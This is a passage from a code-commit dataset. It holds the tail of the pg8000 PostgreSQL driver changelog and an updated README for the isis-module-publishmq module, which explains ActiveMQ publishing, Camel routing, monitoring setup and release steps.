:meth:`~pg8000.dbapi.CursorWrapper.copy_from` methods on cursor objects, to\n allow the usage of the PostgreSQL COPY queries. Thanks to Bob Ippolito for\n the original patch.\n\n* Added the :attr:`~pg8000.dbapi.ConnectionWrapper.notifies` and\n :attr:`~pg8000.dbapi.ConnectionWrapper.notifies_lock` attributes to DBAPI\n connection objects to provide access to server-side event notifications.\n Thanks again to Bob Ippolito for the original patch.\n\n* Improved performance using buffered socket I\/O.\n\n* Added valid range checks for :class:`~pg8000.types.Interval` attributes.\n\n* Added binary transmission of :class:`~decimal.Decimal` values. This permits\n full support for NUMERIC[] types, both send and receive.\n\n* New `Sphinx <http:\/\/sphinx.pocoo.org\/>`_-based website and documentation.\n
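A sketch of the NUMERIC[] support described above, written against a modern\n pg8000 API for brevity (connection details are illustrative):\n\n[source,python]\n----\nfrom decimal import Decimal\n\nimport pg8000\n\ncon = pg8000.connect(user=\"postgres\", password=\"secret\")\ncur = con.cursor()\n\n# A list of Decimals is sent as a NUMERIC[] parameter, and is returned as a\n# list of Decimals.\ncur.execute(\"SELECT CAST(%s AS numeric[])\", ([Decimal(\"1.10\"), Decimal(\"2.25\")],))\nprint(cur.fetchone()[0])  # [Decimal('1.10'), Decimal('2.25')]\n\ncon.close()\n----\n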
=== Version 1.06, 2008-12-09\n\n* pg8000-py3: a branch of pg8000 fully supporting Python 3.0.\n\n* New Sphinx-based documentation.\n\n* Support for PostgreSQL array types -- INT2[], INT4[], INT8[], FLOAT[],\n DOUBLE[], BOOL[], and TEXT[]. New support permits both sending and\n receiving these values.\n\n* Limited support for receiving RECORD types. If a record type is received,\n it will be translated into a Python dict object.\n\n* Fixed potential threading bug where the socket lock could be lost during\n error handling.\n\n\n=== Version 1.05, 2008-09-03\n\n* Proper support for timestamptz field type:\n\n * Reading a timestamptz field results in a datetime.datetime instance that\n has a valid tzinfo property. tzinfo is always UTC.\n\n * Sending a datetime.datetime instance with a tzinfo value will be\n sent as a timestamptz type, with the appropriate tz conversions done.\n\n* Map postgres <--> python text encodings correctly.\n\n* Fix bug where underscores were not permitted in pyformat names.\n\n* Support \"%s\" in a pyformat string.\n\n* Add cursor.connection DB-API extension.\n\n* Add cursor.next and cursor.__iter__ DB-API extensions.\n\n* DBAPI documentation improvements.\n\n* Don't attempt rollback in cursor.execute if a ConnectionClosedError occurs.\n\n* Add warning for accessing exceptions as attributes on the connection object,\n as per DB-API spec.\n\n* Fix up open connection when an unexpected error occurs, rather than\n leaving the connection in an unusable state.\n\n* Use setuptools\/egg package format.\n\n\n=== Version 1.04, 2008-05-12\n\n* DBAPI 2.0 compatibility:\n\n * rowcount returns rows affected when appropriate (eg. UPDATE, DELETE)\n\n * Fix CursorWrapper.description to return a 7 element tuple, as per spec.\n\n * Fix CursorWrapper.rowcount when using executemany.\n\n * Fix CursorWrapper.fetchmany to return an empty sequence when no more\n results are available.\n\n * Add access to DBAPI exceptions through connection properties.\n\n * Raise exception on closing a closed connection.\n\n * Change DBAPI.STRING to varchar type.\n\n * rowcount returns -1 when appropriate.\n\n * DBAPI implementation now passes Stuart Bishop's Python DB API 2.0 Anal\n Compliance Unit Test.\n\n* Make interface.Cursor class use unnamed prepared statement that binds to\n parameter value types. 
This change increases the accuracy of PG's query\n plans by including parameter information, hence increasing performance in\n some scenarios.\n\n* Raise exception when reading from a cursor without a result set.\n\n* Fix bug where a parse error may have rendered a connection unusable.\n\n\n=== Version 1.03, 2008-05-09\n\n* Separate pg8000.py into multiple python modules within the pg8000 package.\n There should be no need for a client to change how pg8000 is imported.\n\n* Fix bug in row_description property when query has not been completed.\n\n* Fix bug in fetchmany dbapi method that did not properly deal with the end of\n result sets.\n\n* Add close methods to DB connections.\n\n* Add callback event handlers for server notices, notifications, and runtime\n configuration changes.\n\n* Add boolean type output.\n\n* Add date, time, and timestamp types in\/out.\n\n* Add recognition of \"SQL_ASCII\" client encoding, which maps to Python's\n \"ascii\" encoding.\n\n* Add types.Interval class to represent PostgreSQL's interval data type, and\n appropriate wire send\/receive methods.\n\n* Remove unused type conversion methods.\n\n\n=== Version 1.02, 2007-03-13\n\n* Add complete DB-API 2.0 interface.\n\n* Add basic SSL support via ssl connect bool.\n\n* Rewrite pg8000_test.py to use Python's unittest library.\n\n* Add bytea type support.\n\n* Add support for parameter output types: NULL value, timestamp value, python\n long value.\n\n* Add support for input parameter type oid.\n\n\n=== Version 1.01, 2007-03-09\n\n* Add support for writing floats and decimal objs up to PG backend.\n\n* Add new error handling code and tests to make sure connection can recover\n from a database error.\n\n* Fixed bug where timestamp types were not always returned in the same binary\n format from the PG backend. Text format is now being used to send\n timestamps.\n\n* Fixed bug where large packets from the server were not being read fully, due\n to socket.read not always returning full read size requested. It was a\n lazy-coding bug.\n\n* Added locks to make most of the library thread-safe.\n\n* Added UNIX socket support.\n\n\n=== Version 1.00, 2007-03-08\n\n* First public release. 
Although fully functional, this release is mostly\n lacking in production testing and in type support.\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c26286873e0116d34216c881b9223aa7041b07b5","subject":"Further updates to README, aim -> ixn","message":"Further updates to README, aim -> ixn\n","repos":"isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq,isisaddons\/isis-module-publishmq","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= isis-module-publishmq\n:_imagesdir: .\/\n\nimage:https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq.png?branch=master[Build Status,link=https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq]\n\nThis module, intended for use with http:\/\/isis.apache.org[Apache Isis], provides an implementation of Apache Isis' link:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-PublishingService[`PublishingService`] SPI that submits an XML representation of each link:https:\/\/github.com\/apache\/isis\/blob\/master\/core\/schema\/src\/main\/resources\/org\/apache\/isis\/schema\/ixn\/ixn.xsd[`MemberInteractionDto`] to an link:http:\/\/activemq.apache.org[ActiveMQ] queue.\n\nThe example app itself also demonstrates how this member interaction event (action invocation or property edit) can\nbe routed using link:http:\/\/camel.apache.org[Apache Camel]:\n\n* the payload is enriched using Apache Isis' own link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_restfulobjects-viewer[Restful Objects] viewer (obtaining additional information).\n* the enriched message is used to post to a (fake) external SOAP service, eg representing a General Ledger.\n\nIn addition, the example app configures link:https:\/\/jolokia.org\/[Jolokia], allowing the ActiveMQ, Camel and other JMX beans to be administered from an external console such as link:hawt.io[Hawt.io].\n\nThe diagram below shows the moving parts:\n\nimage::webapp\/src\/main\/webapp\/images\/overview.png[link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/webapp\/src\/main\/webapp\/images\/overview.png\"]\n\n\nOne of the design objectives for the PublishMq module is to allow the ActiveMQ queue (and therefore any Camel routing) to be either embedded (as in the example app) or to be remote. This is one of the reasons why the payload posted to the queue is the XML representation of a JAXB object (the `InteractionDto`).\n\nTo make the example app easier to run, the fake SOAP service representing the external system is actually deployed as a CXF servlet within the example app itself, mounted at `\/soap\/ExternalSystemAdapter\/DemoObject`. It exposes an API for the Camel routing to post to, and also exposes a query API that simply lists the messages received. 
Of course, \"in real life\" this external system would be running somewhere else on the network (as the diagram shows).\n\n\n\n\n== Application walk-through\n\nThe following screenshots show how the publishing service publishes the member interaction events that are then routed\nthrough to the (fake) external system using Camel.\n\n=== Installing the Fixture Data\n\nFirst, install sample data:\n\nimage::images\/010-install-fixtures.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/010-install-fixtures.png\"]\n\nThis returns the first demo object (an instance of `PublishMqDemoObject`):\n\nimage::images\/020-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/020-update-demo-object.png\"]\n\n=== Invoke an action\n\nThe `updateName()` action is defined as:\n\n[source,java]\n----\n@Action(\n semantics = SemanticsOf.IDEMPOTENT,\n publishing = Publishing.ENABLED \/\/ <1>\n)\npublic PublishMqDemoObject updateName(\n @ParameterLayout(named=\"Name\") final String name) {\n setName(name);\n return this;\n}\n----\n<1> invocations of this action will be published to the configured implementation of `PublishingService`.\n\n\nInvoke the action:\n\nimage::images\/030-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/030-update-demo-object.png\"]\n\nthe value of the `name` property should, of course, be updated:\n\nimage::images\/040-demo-object-updated.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/040-demo-object-updated.png\"]\n\n\n=== Camel routing\n\nThe example app defines the following Camel route (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[camel-config.xml]):\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"updateFakeSoapServiceRoute\">\n <from uri=\"activemq-broker:queue:memberInteractionsQueue\"\/> <!-- 1 -->\n <unmarshal>\n <jaxb contextPath=\"org.apache.isis.schema.ixn.v1\" prettyPrint=\"true\"\/> <!-- 2 -->\n <\/unmarshal>\n <camel:process ref=\"addExchangeHeaders\"\/> <!-- 3 -->\n <camel:choice>\n <camel:when> <!-- 4 -->\n <camel:simple> <!-- 5 -->\n ${header.ixn[execution$memberIdentifier]} ==\n 'org.isisaddons.module.publishmq.fixture.dom.PublishMqDemoObject#updateName()'\n <\/camel:simple>\n <log message=\"updateName() received... \"\/>\n <camel:process ref=\"attachDomCanonicalDtoUsingRestfulObjects\"\/> <!-- 6 -->\n <camel:process ref=\"postToFakeExternalSoapService\"\/> <!-- 7 -->\n <log message=\"internalId: ${header.externalSystemInternalId}\"\/> <!-- 8 -->\n <camel:to uri=\"stream:out\"\/> <!-- 9 -->\n <\/camel:when>\n <camel:when>\n ...\n <\/camel:when>\n <\/camel:choice>\n <\/route>\n<\/camelContext>\n----\n<1> subscribe to ActiveMQ for incoming member interaction events (in XML form). This uses the internal `vm:\/\/` protocol for speed\n<2> unmarshal to a (JAXB annotated) `InteractionDto` object\n<3> use the `AddExchangeHeaders` component provided by this module to add the metadata from the `InteractionDto` to the Camel message. This allows the message to be routed\n<4> use Camel to select which sub-route to follow, using...\n<5> ... the header attached earlier. 
The action identifier header is usually used as the predicate for selecting the sub-route\n<6> Use a processor (implemented in the example app) to attach a DTO obtained from a call to Restful Objects.\n<7> Use a processor (implemented in the example app) to post a message to the fake external SOAP service.\n<8> Log the id allocated by the fake server to the console. This will increment for each call\n<9> Log the message payload to the console. Note that this does not include any attachments\n\nThe referenced beans are defined as:\n\n[source,xml]\n----\n<bean id=\"activemq-broker\"\n class=\"org.apache.activemq.camel.component.ActiveMQComponent\">\n <property name=\"brokerURL\" value=\"vm:\/\/broker?create=false&amp;waitForStart=5000\"\/>\n<\/bean>\n<bean id=\"addExchangeHeaders\"\n class=\"org.isisaddons.module.publishmq.dom.camel.AddExchangeHeaders\"\/> <!--1-->\n<bean id=\"attachDomCanonicalDtoUsingRestfulObjects\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.AttachDemoObjectDto\"\n init-method=\"init\"> <!--2-->\n <property name=\"base\" value=\"${attachDomCanonicalDto.base}\"\/>\n <property name=\"username\" value=\"${attachDomCanonicalDto.username}\"\/>\n <property name=\"password\" value=\"${attachDomCanonicalDto.password}\"\/>\n<\/bean>\n<bean id=\"postToFakeExternalSoapService\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.PostToExternalWebServiceUsingSoap\"\n init-method=\"init\"> <!--3-->\n <property name=\"endpointAddressBase\"\n value=\"${updateExternalSystemAdapter.endpointAddressBase}\"\/>\n <property name=\"endpointAddressSuffix\"\n value=\"${updateExternalSystemAdapter.endpointAddressSuffix}\"\/>\n<\/bean>\n----\n<1> adds the exchange headers for routing (step 3 in the route, above)\n<2> calls Restful Objects to obtain a DTO representing the updated entity (step 6 in the route)\n<3> calls fake SOAP service (step 7 in the route)\n\nThere are two observable side-effects from the execution of this route. First, when the fake SOAP service is\ncalled, it should return an internal Id. This, along with the rest of the message payload, is logged to the console:\n\nimage::images\/050-camel-route-logging.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/050-camel-route-logging.png\"]\n\nThe screenshot also highlights the two important pieces of information used by the route: the member identifier metadata -- added as a Camel header for routing -- and the target object that was updated.\n\nSecond, we can query the fake SOAP service to see the data that was posted to it. The screenshot below uses link:http:\/\/www.soapui.org\/[SOAP UI], which can generate stub requests from the fake SOAP service's WSDL (http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl[http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl]):\n\nimage::images\/060-query-fake-server.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/060-query-fake-server.png\"]\n\n[WARNING]\n====\nThe above screenshot is out-of-date, showing the format of the `aim.xsd` for 1.12.x, rather than `ixn.xsd` for 1.13.x.\n====\n\n\n=== Proxying the REST and SOAP calls\n\nTo see in a little more detail what the `attachDtoFromRestfulObjects` and `postToFakeExternalSoapService` processors actually do, we can use the venerable link:http:\/\/ws.apache.org\/tcpmon\/download.cgi[tcpmon] to act as a proxy. 
For example, we can set up port 6060 to forward onto port 8080:\n\nimage::images\/110-proxy-restful-objects.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/110-proxy-restful-objects.png\"]\n\nWe can similarly do the same for port 7070, also forwarding onto port 8080.\n\nThen, we can reconfigure the app to use these different ports by editing link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`]:\n\n[source,ini]\n----\nattachDomCanonicalDto.base=http:\/\/localhost:6060\/restful\/\nupdateExternalSystemAdapter.endpointAddressBase=http:\/\/localhost:7070\/soap\/\n...\n----\n\nWhen we run once more, we can see that the `attachDtoFromRestfulObjects` processor uses conneg support to obtain a specific canonical DTO that represents the original `PublishMqDemoObject` entity:\n\nimage::images\/120-conneg.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/120-conneg.png\"]\n\nUsing DTOs in this way is important because we want the Camel event bus logic to be decoupled from changes to the\ninternals of the Apache Isis app. As the screenshot shows, the processor specifies an HTTP Accept header. The\nRestful Objects viewer delegates to the configured\nlink:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-ContentNegotiationService[`ContentNegotiationService`]\nSPI, which knows how to map the `PublishMqDemoObject` entity into the requested `DemoObjectDto` DTO:\n\n[source,java]\n----\n@DomainService(nature = NatureOfService.DOMAIN)\npublic class PublishMqDemoContentMappingService implements ContentMappingService {\n public Object map(\n final Object object,\n final List<MediaType> acceptableMediaTypes) {\n if(object instanceof PublishMqDemoObject) {\n \/\/ copy the entity's state, plus a bookmark (as an OidDto), into the DTO\n final PublishMqDemoObject demoObject = (PublishMqDemoObject) object;\n final Bookmark bookmark = bookmarkService.bookmarkFor(object);\n final DemoObjectDto dto = new DemoObjectDto();\n dto.setName(demoObject.getName());\n dto.setDescription(demoObject.getDescription());\n final OidDto oidDto = bookmark.toOidDto();\n dto.setOid(oidDto);\n return dto;\n }\n \/\/ a null return means this mapper does not handle the object\n return null;\n }\n @javax.inject.Inject\n private BookmarkService bookmarkService;\n}\n----\n\nThe call to the fake SOAP service meanwhile is more straightforward: we observe just the regular SOAP messages (the\nimplementation uses `wsdl2java` to create stubs, so the code is very simple):\n\nimage::images\/210-proxy-soapservice.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/210-proxy-soapservice.png\"]\n\n=== Jolokia and Hawt.io\n\nAs mentioned in the introduction, the example app also configures Jolokia so that consoles such as Hawt.io can be used to monitor\/administer internal JMX beans (including ActiveMQ and Camel).\n\nConfiguring Jolokia itself turns out to be as simple as updating the classpath and adding its servlet to the `web.xml`:\n\n[source,xml]\n----\n<servlet>\n <servlet-name>jolokia-agent<\/servlet-name>\n <servlet-class>org.jolokia.http.AgentServlet<\/servlet-class>\n <init-param>\n <param-name>discoveryEnabled<\/param-name>\n <param-value>false<\/param-value>\n <\/init-param>\n <init-param>\n <param-name>agentDescription<\/param-name>\n <param-value>Apache ActiveMQ<\/param-value>\n <\/init-param>\n <load-on-startup>1<\/load-on-startup>\n<\/servlet>\n<servlet-mapping>\n <servlet-name>jolokia-agent<\/servlet-name>\n <!-- using same 
convention as standalone ActiveMQ -->\n <url-pattern>\/api\/jolokia\/*<\/url-pattern>\n<\/servlet-mapping>\n----\n\nWith this done, we can use Hawt.io to connect to the service:\n\nimage::images\/310-connect-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/310-connect-activemq.png\"]\n\nHawt.io itself runs as a separate webapp. For testing purposes, it can also be run from the command line, eg:\n\n[source,bash]\n----\njava -jar hawtio-app-1.4.51.jar --port 9090\n----\n\n\n=== Monitoring ActiveMQ and Camel\n\nOnce connected we can navigate to the ActiveMQ tab:\n\nimage::images\/320-monitor-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/320-monitor-activemq.png\"]\n\nand similarly to the Camel tab:\n\nimage::images\/330-monitor-camel.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/330-monitor-camel.png\"]\n\n\n\n\n== How to run the Demo App\n\nThe prerequisite software is:\n\n* Java JDK 7 (nb: Isis currently does not support JDK 8)\n* http:\/\/maven.apache.org[maven 3] (3.2.x or later is recommended).\n\nTo build the demo app:\n\n[source]\n----\ngit clone https:\/\/github.com\/isisaddons\/isis-module-publishmq.git\nmvn clean install\n----\n\nTo run the demo app:\n\n[source]\n----\nmvn antrun:run -P self-host\n----\n\nThen log on using user: `sven`, password: `pass`\n\n\nIf you want to proxy the Restful Objects and\/or fake SOAP servers, then update `spring.properties` and run `tcpmon` or similar (as shown in the app walkthrough, above).\n\nHawt.io is a standalone utility that is _not_ integrated into the example webapp; if you want to run it then specify `--port` so that it runs on some other port than its default, 8080.\n\n\n\n\n\n== How to configure\/use\n\nYou can either use this module \"out-of-the-box\", or you can fork this repo and extend it to your own requirements.\n\nThe module itself consists of submodules:\n\n* `dom-servicespi`, containing the `PublishingService` SPI implementation\n* `dom-camel`, that provides a utility class to help route messages.\n* `dom`, parent module\n\n\n\n=== \"Out-of-the-box\"\n\nTo use \"out-of-the-box\":\n\n* update your classpath by importing the parent module's dependency into your parent module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>${project.groupId}<\/groupId>\n <artifactId>isis-module-publishmq-dom<\/artifactId>\n <version>1.12.0<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n<\/dependencyManagement>\n----\n\n* if using `AppManifest`, then update its `getModules()` method: +\n\n[source,java]\n----\n @Override\n public List<Class<?>> getModules() {\n return Arrays.asList(\n ...\n org.isisaddons.module.publishmq.PublishMqModule.class,\n ...\n );\n }\n----\n\n* otherwise, in your project's `webapp` module, update your `WEB-INF\/isis.properties`. 
+\n+\n[source,xml]\n----\n isis.services.ServicesInstallerFromAnnotation.packagePrefix=\\\n ...\\\n org.isisaddons.module.publishmq.dom,\\\n ...\n----\n+\nYou might also need to specify the package for any new services that you have written, eg an implementation of `ContentNegotiationService` or similar.\n\n* update your classpath by adding the `-dom-servicespi` dependency to your project's `dom` module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-servicespi<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n\n* if you are using Camel for routing and want to use the `AddExchangeHeaders` utility class, then -- in the appropriate module within your app -- add the dependency: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-camel<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n+\nIn the example app all the Camel routing can be found in the `-fixture-routing` module.\n\n\n* configure ActiveMQ so that the publishing service implementation can post to a queue called `memberInteractionsQueue`. +\n+\nIn the example app this is done using Spring (link:webapp\/src\/main\/resources\/activemq-config.xml[activemq-config.xml]):\n+\n[source,xml]\n----\n<beans\n xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n http:\/\/activemq.apache.org\/schema\/core http:\/\/activemq.apache.org\/schema\/core\/activemq-core.xsd\">\n <broker xmlns=\"http:\/\/activemq.apache.org\/schema\/core\"\n brokerName=\"broker\"\n dataDirectory=\"${activemq.data}\"\n useShutdownHook=\"false\"\n useJmx=\"true\"\n >\n ...\n <destinations>\n <queue physicalName=\"memberInteractionsQueue\"\/>\n <\/destinations>\n ...\n <\/broker>\n<\/beans>\n----\n+\nThis is bootstrapped in the `web.xml`:\n+\n[source,xml]\n----\n<listener>\n <listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n<\/listener>\n<context-param>\n <param-name>contextConfigLocation<\/param-name>\n <param-value>\n classpath:activemq-config.xml\n <\/param-value>\n<\/context-param>\n----\n\nNotes:\n\n* Check for later releases by searching http:\/\/search.maven.org\/#search|ga|1|isis-module-publishmq-dom[Maven Central Repo].\n\n\n==== \"Out-of-the-box\" (-SNAPSHOT)\n\nIf you want to use the current `-SNAPSHOT`, then the steps are the same as above, except:\n\n* when updating the classpath, specify the appropriate -SNAPSHOT version:\n\n[source,xml]\n----\n<version>1.13.0-SNAPSHOT<\/version>\n----\n\n* add the repository definition to pick up the most recent snapshot (we use the Cloudbees continuous integration service). 
We suggest defining the repository in a `<profile>`:\n\n[source,xml]\n----\n<profile>\n <id>cloudbees-snapshots<\/id>\n <activation>\n <activeByDefault>true<\/activeByDefault>\n <\/activation>\n <repositories>\n <repository>\n <id>snapshots-repo<\/id>\n <url>http:\/\/repository-estatio.forge.cloudbees.com\/snapshot\/<\/url>\n <releases>\n <enabled>false<\/enabled>\n <\/releases>\n <snapshots>\n <enabled>true<\/enabled>\n <\/snapshots>\n <\/repository>\n <\/repositories>\n<\/profile>\n----\n\n=== Forking the repo\n\nIf instead you want to extend this module's functionality, then we recommend that you fork this repo. The repo is\nstructured as follows:\n\n* `pom.xml` - parent pom\n* `dom` - the module implementation, itself a parent with submodules:\n** `dom-servicespi` - the implementation of `PublishingServiceUsingActiveMq`; depends on the Apache Isis applib\n** `dom-camel` - providing the `AddExchangeHeaders` utility for routing messages using Camel\n* `fixture` - fixtures, itself a parent with submodules:\n** `fixture-dom` - holding sample domain objects; depends on `dom-servicespi`\n** `fixture-scripts` - holding sample fixture (data) setup scripts\n** `fixture-canonical` - defines the canonical `DemoObjectDto`, as queried for using Restful Objects. This uses `xjc` to convert the XSD into the Java DTO.\n** `fixture-canonicalmappings` - contains the implementation of `ContentMappingService` to map the `PublishMqDemoObject` entity to the `DemoObjectDto` DTO\n** `fixture-routing` - contains the example Camel route\n* `externalsystemadapter` - parent module for the fake external system exposing a SOAP web service:\n** `externalsystemadapter-wsdl` - defines the WSDL for the fake SOAP service\n** `externalsystemadapter-wsdlgen` - generates the stub classes for both client and server\n** `externalsystemadapter-fakeserver` - implementation of the fake server (embedded in the example webapp for convenience\/testing)\n* `integtests` - (TODO) integration tests for the module; depends on `fixture-dom`\n* `webapp` - demo webapp (see above screenshots); depends on `dom` and `fixture`\n\nOnly the `dom` module (with its submodules) is released to Maven Central Repo. The versions of the other modules are purposely left at `0.0.1-SNAPSHOT` because they are not intended to be released.\n\n\n\n== Also of note\n\nThe example app contains a few other little tricks that may be useful if you are looking to deploy a similar architecture for your own application.\n\n=== Generate Canonical DTO referencing Apache Isis' DTOs\n\nAs of 1.13.0 Apache Isis includes the link:http:\/\/isis.apache.org\/schema\/ixn\/ixn.xsd[`ixn.xsd`] (member interaction)\nschema (replacing and generalizing the `aim.xsd` provided from 1.9.0 through 1.12.x). The `PublishingServiceMq` uses\nthis `ixn.xsd` schema (or rather, its Java JAXB equivalent, `InteractionDto`) directly.\n\nThe similar `common.xsd` is _also_ used by the demo app in the construction of its own canonical `DemoObjectDto` (use of\n`OidDto` to represent a bookmark to a published domain object).\n\n\n=== Centralized Spring configuration\n\nIn the example app Spring is used to bootstrap ActiveMQ (link:webapp\/src\/main\/resources\/activemq-config.xml[`activemq-config.xml`]), and Camel (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[`camel-config.xml`]), and also the fake SOAP Subscriber (link:webapp\/src\/main\/resources\/externalSystemFakeServer-config.xml[`externalSystemFakeServer-config.xml`]). 
The configuration for all is centralized through a propertyPlaceholderConfigurer bean (defined in link:webapp\/src\/main\/resources\/propertyPlaceholderConfigurer-config.xml#L23[`propertyPlaceholderConfigurer-config.xml`]).\n\nThe location of the property file is specified in the link:webapp\/src\/main\/webapp\/WEB-INF\/web.xml#L44[`web.xml`]:\n\n[source,xml]\n----\n<context-param>\n <param-name>spring.config.file<\/param-name>\n <param-value>classpath:spring.properties<\/param-value>\n<\/context-param>\n----\n\nwhere link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`] is:\n\n[source,ini]\n----\nactivemq.data=activemq-data\nenrichWithCanonicalDto.base=http:\/\/localhost:8080\/restful\/\nenrichWithCanonicalDto.username=sven\nenrichWithCanonicalDto.password=pass\nupdateExternalSystemAdapter.endpointAddress=http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject\n----\n\nIf necessary the location of this config file can be overridden; see link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_deployment_externalized-configuration[this topic] in the Apache Isis user guide.\n\n\n=== WSDL to Java\n\nSimilar to the way in which the .xsd schemas are converted to Java, `wsdl2java` is used to convert the fake server's WSDL to Java stubs. This WSDL can be found link:externalsystemadapter\/wsdl\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/externalsystemadapter\/wsdl\/DemoObject.wsdl[here]; the `pom.xml` configuration can be found link:https:\/\/github.com\/isisaddons\/isis-module-publishmq\/blob\/master\/externalsystemadapter\/wsdlgen\/pom.xml#L76[here].\n\n\n\n\n\n== Related Modules\/Services\n\nThe http:\/\/github.com\/isisaddons\/isis-module-publishing[Isis addons' publishing] module provides an alternative implementation of `PublishingService` SPI that publishes to a database table.\n\n\n\n\n== Known issues\n\nNone at this time.\n\n\n\n== Change Log\n\n* `1.12.0` - released against Isis 1.12.0\n* `1.11.0` - released against Isis 1.11.0.\n* `1.10.0` - released against Isis 1.10.0\n* `1.9.0` - released against Isis 1.9.0\n\n\n\n== Legal Stuff\n\n=== License\n\n[source]\n----\nCopyright 2015 Dan Haywood\n\nLicensed under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. See the License for the\nspecific language governing permissions and limitations\nunder the License.\n----\n\n=== Dependencies\n\nThe module depends on link:http:\/\/activemq.apache.org[ActiveMQ] and also link:http:\/\/camel.apache.org[Camel]. The latter can be considered optional, because that dependency only provides a supporting utility class (`AddExchangeHeaders`).\n\n\n\n\n== Maven deploy notes\n\nOnly the `dom` module is deployed, and is done so using Sonatype's OSS support (see\nhttp:\/\/central.sonatype.org\/pages\/apache-maven.html[user guide]).\n\n=== Release to Sonatype's Snapshot Repo\n\nTo deploy a snapshot, use:\n\n[source]\n----\npushd dom\nmvn clean deploy\npopd\n----\n\nThe artifacts should be available in Sonatype's\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots[Snapshot Repo].\n\n\n\n=== Release to Maven Central\n\nThe `release.sh` script automates the release process. 
It performs the following:\n\n* performs a sanity check (`mvn clean install -o`) that everything builds ok\n* bumps the `pom.xml` to a specified release version, and tags the release\n* performs a double check (`mvn clean install -o`) that everything still builds ok\n* releases the code using `mvn clean deploy`\n* bumps the `pom.xml` to the specified snapshot version\n\nFor example:\n\n[source]\n----\nsh release.sh 1.13.0 \\\n 1.14.0-SNAPSHOT \\\n dan@haywood-associates.co.uk \\\n \"this is not really my passphrase\"\n----\n\nwhere:\n\n* `$1` is the release version\n* `$2` is the snapshot version\n* `$3` is the email of the secret key (`~\/.gnupg\/secring.gpg`) to use for signing\n* `$4` is the corresponding passphrase for that secret key.\n\nOther ways of specifying the key and passphrase are available; see the `pgp-maven-plugin`'s\nhttp:\/\/kohsuke.org\/pgp-maven-plugin\/secretkey.html[documentation].\n\nIf the script completes successfully, then push changes:\n\n[source]\n----\ngit push origin master\ngit push origin 1.13.0\n----\n\nIf the script fails to complete, then identify the cause, perform a `git reset --hard` to start over and fix the issue\nbefore trying again. Note that in the `dom`'s `pom.xml` the `nexus-staging-maven-plugin` has the\n`autoReleaseAfterClose` setting set to `true` (to automatically stage, close and release the repo). You may want\nto set this to `false` if debugging an issue.\n\nAccording to Sonatype's guide, it takes about 10 minutes to sync, but up to 2 hours to update http:\/\/search.maven.org[search].","old_contents":"= isis-module-publishmq\n:_imagesdir: 